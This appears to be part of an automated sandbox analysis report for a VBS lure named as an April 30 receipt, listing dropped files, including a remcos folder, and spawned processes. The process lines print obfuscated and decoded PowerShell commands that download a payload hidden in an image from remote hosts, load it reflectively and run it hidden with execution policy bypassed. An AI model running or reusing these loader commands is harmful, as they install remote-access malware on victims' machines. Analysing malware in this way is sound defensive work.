Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Tapril-30-receipt.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\osma.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\ova.vbs
|
ASCII text, with very long lines (332), with CRLF line terminators
|
modified
|
||
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\fbshgr.vbe
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\oahxgk.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\zQdp8jhj[1].txt
|
Unicode text, UTF-8 text, with very long lines (12085), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\eEY9exCe[1].txt
|
Unicode text, UTF-8 text, with very long lines (10406), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\KiVfSXMq[1].txt
|
Unicode text, UTF-8 text, with very long lines (11166), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sjycg2q.zw3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2imzk442.gpv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4doeplt3.roi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5gconrz.wz1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbq2efyl.2wy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iljlgkjz.eea.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0wwkqj2.y53.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mm4qs2tz.ant.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwrpbok3.hys.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sssyoyhd.r3f.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0pqsgq5.mu3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yausfbkn.orf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON
|
data
|
dropped
|
||
\Device\Mup\user-PC\PIPE\samr
|
GLS_BINARY_LSB_FIRST
|
dropped
|
||
\Device\Mup\user-PC\PIPE\wkssvc
|
GLS_BINARY_LSB_FIRST
|
dropped
|
There are 18 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tapril-30-receipt.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreaQByDgTreHDgTreDgTreYQB3DgTreHgDgTreLwBzDgTreGMDgTreLwB6DgTreG4DgTreLgBlDgTreG4DgTreaQBkDgTreGwDgTreYQByDgTreGUDgTreZwB5DgTreGEDgTredDgTreBzDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreG8DgTrecwBtDgTreGEDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029',
'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/sc/zn.enidlaregyats//:sptth' , '1' , 'C:\ProgramData\' , 'osma','RegAsm',''))}
}"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\osma.vbs"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\osma.vbs"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\fbshgr.vbe"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\oahxgk.vbs"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\osma.vbs"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewD